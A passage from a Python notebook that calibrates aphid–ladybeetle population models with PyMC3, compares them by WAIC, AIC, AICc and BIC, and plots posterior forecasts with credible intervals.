plt.savefig("img/calibration_AP3.png", dpi=300)
plt.show()
# In[ ]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_AP3.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_AP3.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[ ]:
df_realizations
# In[ ]:
# In[ ]:
# In[ ]:
# # Model comparison/selection
# ## From PyMC3
#
# Check [this example](https://docs.pymc.io/pymc-examples/examples/diagnostics_and_criticism/model_comparison.html) for further information.
#
# TL;DR: The "score", which is "loo" or "waic" in the printed dataframe bellow, should the greatest for the best model. The `weight` is one of the most important information, because it loosely tell the probability of the model to be the "correct one" among all the compared models.
# In[ ]:
print("\n*** Performing model comparison ***")
start_time = time.time()
models_to_compare = {
"CP1": trace_calibration_CP1,
"CP2": trace_calibration_CP2,
"CP3": trace_calibration_CP3,
"EP1": trace_calibration_EP1,
"EP2": trace_calibration_EP2,
"EP3": trace_calibration_EP3,
"LP1": trace_calibration_LP1,
"LP2": trace_calibration_LP2,
"LP3": trace_calibration_LP3,
"AP1": trace_calibration_AP1,
"AP2": trace_calibration_AP2,
"AP3": trace_calibration_AP3,
}
# Choose ic='loo' or ic='waic'
df_model_comparison = pm.compare(
models_to_compare,
ic='waic',
method='BB-pseudo-BMA',
b_samples=3000,
seed=seed
)
duration = time.time() - start_time
print(f"-- Model comparison done in {duration / 60:.3f} minutes")
df_model_comparison
# In[ ]:
az.plot_compare(df_model_comparison, figsize=(12, 4), insample_dev=False)
plt.show()
# ## Custom (and basic) information criteria
#
# The criteria employed here are:
#
# * AIC -- Akaike Information Criterion
# * BIC -- Bayesian Information Criterion
#
# Both ICs are based on the residual of least squares. This approach has as hypothesis that the error residuals, i.e., $\sum_{i = 1}^n (y^{\text{obs}}_i - y^{\text{model}}_i)^2$, are independent identical normal, with zero mean.
#
# An auxiliary quantity is defined in order to compare the models (relative to the best one):
#
# \begin{equation}
# \mathcal{L}^{\text{rel}}_i := \exp{\left(\frac{\text{IC}_{\text{min}} - \text{IC}_i}{2}\right)}
# \end{equation}
#
# where $\text{IC}_i$ is the information criterion value (it can be AIC or BIC) for the $i$th model, and $\text{IC}_{\text{min}}$ is the minimum (i.e., the best model) information criterion value from the set of compared models.
#
# This auxiliary quantity is known as "relative likelihood". It is proportional to the probability that the $i$th model minimizes the information loss. For the best model, this value will be always equal to 1.
# In[ ]:
def calculate_aic_score(trace, rv_model_name, num_of_parameters, observations):
u_observed, v_observed = observations.T
k = num_of_parameters
n = observations.shape[0]
aic_scores = list()
progress_bar = tqdm(trace[rv_model_name])
for model_realization in progress_bar:
progress_bar.set_description(f"Calculating AIC for {rv_model_name}")
u_realization, v_realization = model_realization.T
u_realization_residual = u_observed - u_realization
v_realization_residual = v_observed - v_realization
u_residual_sum_of_squares = np.sum(u_realization_residual * u_realization_residual)
v_residual_sum_of_squares = np.sum(v_realization_residual * v_realization_residual)
total_residual_sum_of_squares = u_residual_sum_of_squares + v_residual_sum_of_squares
# Information criterion in terms of least-squares error residuals
realization_aic_score = 2 * k + n * np.log(total_residual_sum_of_squares)
aic_scores.append(realization_aic_score)
aic_scores = np.array(aic_scores)
return aic_scores
def calculate_aicc_score(trace, rv_model_name, num_of_parameters, observations):
u_observed, v_observed = observations.T
k = num_of_parameters
n = observations.shape[0]
aic_scores = list()
progress_bar = tqdm(trace[rv_model_name])
for model_realization in progress_bar:
progress_bar.set_description(f"Calculating AICc for {rv_model_name}")
u_realization, v_realization = model_realization.T
u_realization_residual = u_observed - u_realization
v_realization_residual = v_observed - v_realization
u_residual_sum_of_squares = np.sum(u_realization_residual * u_realization_residual)
v_residual_sum_of_squares = np.sum(v_realization_residual * v_realization_residual)
total_residual_sum_of_squares = u_residual_sum_of_squares + v_residual_sum_of_squares
# Information criterion in terms of least-squares error residuals
realization_aic_score = 2 * k + n * np.log(total_residual_sum_of_squares)
realization_aic_score += 2 * (k * k + k) / (n - k - 1)
aic_scores.append(realization_aic_score)
aic_scores = np.array(aic_scores)
return aic_scores
def calculate_bic_score(trace, rv_model_name, num_of_parameters, observations):
u_observed, v_observed = observations.T
k = num_of_parameters
n = observations.shape[0]
bic_scores = list()
progress_bar = tqdm(trace[rv_model_name])
for model_realization in progress_bar:
progress_bar.set_description(f"Calculating BIC for {rv_model_name}")
u_realization, v_realization = model_realization.T
u_realization_residual = u_observed - u_realization
v_realization_residual = v_observed - v_realization
u_residual_sum_of_squares = np.sum(u_realization_residual * u_realization_residual)
v_residual_sum_of_squares = np.sum(v_realization_residual * v_realization_residual)
total_residual_sum_of_squares = u_residual_sum_of_squares + v_residual_sum_of_squares
# Information criterion in terms of least-squares error residuals
realization_bic_score = k * np.log(n) + n * np.log(total_residual_sum_of_squares / n)
bic_scores.append(realization_bic_score)
bic_scores = np.array(bic_scores)
return bic_scores
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_CP1, 'CP1_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_CP1, 'CP1_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_CP1, 'CP1_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_CP2, 'CP2_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_CP2, 'CP2_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_CP2, 'CP2_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_CP3, 'CP3_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_CP3, 'CP3_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_CP3, 'CP3_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_EP1, 'EP1_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_EP1, 'EP1_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_EP1, 'EP1_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_EP2, 'EP2_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_EP2, 'EP2_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_EP2, 'EP2_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_EP3, 'EP3_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_EP3, 'EP3_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_EP3, 'EP3_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_LP1, 'LP1_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_LP1, 'LP1_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_LP1, 'LP1_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_LP2, 'LP2_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_LP2, 'LP2_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_LP2, 'LP2_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_LP3, 'LP3_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_LP3, 'LP3_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_LP3, 'LP3_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_AP1, 'AP1_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_AP1, 'AP1_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_AP1, 'AP1_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_AP2, 'AP2_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_AP2, 'AP2_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_AP2, 'AP2_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aic_scores = calculate_aic_score(trace_calibration_AP3, 'AP3_model', 5, observations_to_fit)
aic_mpv = _scalar_rv_mvp_estimation(aic_scores)
# In[ ]:
plt.hist(aic_scores, bins=30)
plt.axvline(x=aic_mpv, color='red', linestyle='--')
plt.xlabel("AIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
aicc_scores = calculate_aicc_score(trace_calibration_AP3, 'AP3_model', 5, observations_to_fit)
aicc_mpv = _scalar_rv_mvp_estimation(aicc_scores)
# In[ ]:
plt.hist(aicc_scores, bins=30)
plt.axvline(x=aicc_mpv, color='red', linestyle='--')
plt.xlabel("AICc score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
bic_scores = calculate_bic_score(trace_calibration_AP3, 'AP3_model', 5, observations_to_fit)
bic_mpv = _scalar_rv_mvp_estimation(bic_scores)
# In[ ]:
plt.hist(bic_scores, bins=30)
plt.axvline(bic_mpv, color='red', linestyle='--')
plt.xlabel("BIC score")
plt.ylabel("Frequency")
plt.show()
# In[ ]:
# Now we define convenient functions to compare models according to the ICs.
# In[ ]:
def compare_aic(
models_to_compare: dict,
models_num_of_parameters: dict,
observations: np.ndarray
) -> pd.DataFrame:
compare_result = {
'model': list(),
'AIC': list(),
}
for model_name in models_to_compare:
model_trace = models_to_compare[model_name]
model_num_of_parameters = models_num_of_parameters[model_name]
model_aic_scores = calculate_aic_score(
model_trace,
model_name,
model_num_of_parameters,
observations
)
model_aic_mpv = _scalar_rv_mvp_estimation(model_aic_scores)
compare_result['model'].append(model_name)
compare_result['AIC'].append(model_aic_mpv)
df_compare_results = pd.DataFrame(compare_result)
df_compare_results.set_index('model', inplace=True)
df_compare_results.sort_values(by=['AIC'], ascending=True, inplace=True)
return df_compare_results
def compare_aicc(
models_to_compare: dict,
models_num_of_parameters: dict,
observations: np.ndarray
) -> pd.DataFrame:
compare_result = {
'model': list(),
'AICc': list(),
}
for model_name in models_to_compare:
model_trace = models_to_compare[model_name]
model_num_of_parameters = models_num_of_parameters[model_name]
model_aicc_scores = calculate_aicc_score(
model_trace,
model_name,
model_num_of_parameters,
observations
)
model_aicc_mpv = _scalar_rv_mvp_estimation(model_aicc_scores)
compare_result['model'].append(model_name)
compare_result['AICc'].append(model_aicc_mpv)
df_compare_results = pd.DataFrame(compare_result)
df_compare_results.set_index('model', inplace=True)
df_compare_results.sort_values(by=['AICc'], ascending=True, inplace=True)
return df_compare_results
def compare_bic(
models_to_compare: dict,
models_num_of_parameters: dict,
observations: np.ndarray
) -> pd.DataFrame:
compare_result = {
'model': list(),
'BIC': list(),
}
for model_name in models_to_compare:
model_trace = models_to_compare[model_name]
model_num_of_parameters = models_num_of_parameters[model_name]
model_bic_scores = calculate_bic_score(
model_trace,
model_name,
model_num_of_parameters,
observations
)
model_bic_mpv = _scalar_rv_mvp_estimation(model_bic_scores)
compare_result['model'].append(model_name)
compare_result['BIC'].append(model_bic_mpv)
df_compare_results = pd.DataFrame(compare_result)
df_compare_results.set_index('model', inplace=True)
df_compare_results.sort_values(by=['BIC'], ascending=True, inplace=True)
return df_compare_results
def compare_ic(
models_to_compare: dict,
models_num_of_parameters: dict,
observations: np.ndarray,
ic_to_sort: str = 'AIC'
) -> pd.DataFrame:
# Dict to store results
compare_result = {
'model': list(),
'AIC': list(),
'AICc': list(),
'BIC': list(),
}
# Calculate Information Criteria
for model_name in models_to_compare:
compare_result['model'].append(model_name)
model_trace = models_to_compare[model_name]
model_num_of_parameters = models_num_of_parameters[model_name]
# Compute AIC score
model_aic_scores = calculate_aic_score(
model_trace,
model_name,
model_num_of_parameters,
observations
)
model_aic_mpv = _scalar_rv_mvp_estimation(model_aic_scores)
compare_result['AIC'].append(model_aic_mpv)
# Compute AICc score
model_aicc_scores = calculate_aicc_score(
model_trace,
model_name,
model_num_of_parameters,
observations
)
model_aicc_mpv = _scalar_rv_mvp_estimation(model_aicc_scores)
compare_result['AICc'].append(model_aicc_mpv)
# Compute BIC score
model_bic_scores = calculate_bic_score(
model_trace,
model_name,
model_num_of_parameters,
observations
)
model_bic_mpv = _scalar_rv_mvp_estimation(model_bic_scores)
compare_result['BIC'].append(model_bic_mpv)
# Gathering results in a DataFrame
df_compare_results = pd.DataFrame(compare_result)
# Calculate relative likelihoods
available_ICs = ['AIC', 'AICc', 'BIC']
for ic in available_ICs:
ic_array = np.array(compare_result[ic])
min_ic_value = ic_array.min()
ic_relative_likelihoods = np.exp((min_ic_value - ic_array) / 2)
df_compare_results[f'weight_{ic}'] = ic_relative_likelihoods
df_compare_results.set_index('model', inplace=True)
df_compare_results.sort_values(by=[ic_to_sort], ascending=True, inplace=True)
return df_compare_results
# In[ ]:
models_to_compare = {
# Model names have to be the same as used in PyMC3 sampling
"CP1_model": trace_calibration_CP1,
"CP2_model": trace_calibration_CP2,
"CP3_model": trace_calibration_CP3,
"EP1_model": trace_calibration_EP1,
"EP2_model": trace_calibration_EP2,
"EP3_model": trace_calibration_EP3,
"LP1_model": trace_calibration_LP1,
"LP2_model": trace_calibration_LP2,
"LP3_model": trace_calibration_LP3,
"AP1_model": trace_calibration_AP1,
"AP2_model": trace_calibration_AP2,
"AP3_model": trace_calibration_AP3,
}
# Num of calibrated parameters for each model
models_num_of_parameters = {
# Model names have to be the same as used in PyMC3 sampling
"CP1_model": 3,
"CP2_model": 4,
"CP3_model": 4,
"EP1_model": 3,
"EP2_model": 4,
"EP3_model": 4,
"LP1_model": 3,
"LP2_model": 5,
"LP3_model": 4,
"AP1_model": 5,
"AP2_model": 4,
"AP3_model": 5,
}
df_compare_aic = compare_aic(
models_to_compare,
models_num_of_parameters,
observations_to_fit
)
df_compare_aic
# In[ ]:
df_compare_bic = compare_bic(
models_to_compare,
models_num_of_parameters,
observations_to_fit
)
df_compare_bic
# In[ ]:
df_compare_ic = compare_ic(
models_to_compare,
models_num_of_parameters,
observations_to_fit
)
df_compare_ic
# In[ ]:
df_ic_values = df_compare_ic[['AIC', 'AICc', 'BIC']].T
df_ic_weights = df_compare_ic[['weight_AIC', 'weight_AICc', 'weight_BIC']].T
# In[ ]:
ax = df_ic_values.plot.bar(figsize=(8, 6), rot=0)
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.1), ncol=2)
plt.show()
# In[ ]:
ax = df_ic_weights.plot.bar(figsize=(8, 6), rot=0)
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.1), ncol=2)
plt.show()
# # Uncertainty propagation
# ## CP1 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_CP1 = copy.deepcopy(fine_model_CP1)
with fine_model_to_forecast_CP1:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_CP1,
var_names=["CP1_model"],
random_seed=seed
)["CP1_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_CP1.png", dpi=300)
plt.show()
# ## CP2 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_CP2 = copy.deepcopy(fine_model_CP2)
with fine_model_to_forecast_CP2:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_CP2,
var_names=["CP2_model"],
random_seed=seed
)["CP2_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_CP2.png", dpi=300)
plt.show()
# ## CP3 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_CP3 = copy.deepcopy(fine_model_CP3)
with fine_model_to_forecast_CP3:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_CP3,
var_names=["CP3_model"],
random_seed=seed
)["CP3_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,0], color='g', lw=4, label='Aphid mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,0], '--', color='g', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,0], '--', color='g', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Aphid density', fontsize=15)
plt.subplot(2, 1, 2)
plt.plot(time_observations, ladybeetle_observed.Density.values, 'X', color='b', lw=4, ms=10.5, label='Observed')
plt.plot(time_range_prediction, mean_model_prediction[:,1], color='b', lw=4, label='Ladybeetle mean (simulated)')
plt.plot(time_range_prediction, credible_lower[:,1], '--', color='b', lw=2, label='Credible intervals')
plt.plot(time_range_prediction, credible_upper[:,1], '--', color='b', lw=2)
plt.legend(fontsize=15, shadow=True)
plt.ylabel('Ladybeetle density', fontsize=15)
plt.xlabel('Time', fontsize=15)
plt.tight_layout()
plt.savefig("img/projections_CP3.png", dpi=300)
plt.show()
# ## EP1 model
# In[ ]:
import copy
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
time_to_forecast = 250
time_range_prediction = np.linspace(t0, tf + time_to_forecast, 100)
fine_model_to_forecast_EP1 = copy.deepcopy(fine_model_EP1)
with fine_model_to_forecast_EP1:
# We update the Data container "years"
pm.set_data({"time": time_range_prediction})
# Then we sample from the calibration posterior
model_prediction = pm.sample_posterior_predictive(
trace_calibration_EP1,
var_names=["EP1_model"],
random_seed=seed
)["EP1_model"]
# In[ ]:
mean_model_prediction = model_prediction.mean(axis=0)
percentile_cut = 2.5
credible_lower = np.percentile(model_prediction, q=percentile_cut, axis=0)
credible_upper = np.percentile(model_prediction, q=100 - percentile_cut, axis=0)
# In[ ]:
plt.figure(figsize=(20, 2*(5)))
plt.subplot(2, 1, 1)
plt.plot(time_observations, aphid_observed.Density.values, 'X', color='g', lw=4, ms=10.5, label='Observed')
